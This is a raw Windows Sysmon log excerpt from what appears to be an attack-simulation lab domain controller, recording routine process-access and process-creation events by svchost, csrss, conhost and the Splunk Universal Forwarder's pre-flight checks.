13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE6-6005-CC00-00000000A301}4792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8EE4-6005-C200-00000000A301}24882604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EE6-6005-CC00-00000000A301}4792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18274|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.364{59A5CD1D-8EE6-6005-CC00-00000000A301}4792C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000003918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.280{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8EE6-6005-CB00-00000000A301}4808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.280{59A5CD1D-8EE6-6005-CB00-00000000A301}48084820C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e675|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f344c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.046{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE6-6005-CB00-00000000A301}4808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.046{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.046{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.046{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.046{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.046{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.046{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.030{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.030{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.030{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.030{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE6-6005-CB00-00000000A301}4808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.030{59A5CD1D-8EE4-6005-C200-00000000A301}24882604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EE6-6005-CB00-00000000A301}4808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18226|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.045{59A5CD1D-8EE6-6005-CB00-00000000A301}4808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd" check-transforms-keysC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000004128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.937{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE7-6005-DB00-00000000A301}2912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 